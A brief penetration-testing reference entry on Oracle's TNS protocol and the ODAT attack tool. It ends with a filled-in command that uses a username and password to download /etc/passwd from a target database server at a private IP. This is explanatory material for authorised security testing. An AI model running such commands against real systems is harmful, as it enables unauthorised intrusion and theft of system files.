Transparent Network Substrate (TNS), a proprietary Oracle computer-networking technology, supports homogeneous peer-to-peer connectivity on top of other networking technologies such as TCP/IP, SDP and named pipes. TNS operates mainly for connecting to Oracle databases. Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. The following command downloads a file with Oracle RDBMS.
Command Reference:
Target: 10.10.10.1
Database: oracle
User: john
Password: password123
Download file: /etc/passwd
Output file: passwd.txt
./odat.py utlfile -s 10.10.10.1 -d oracle -U john -P password123 --test-module --getFile /etc/ passwd passwd.txt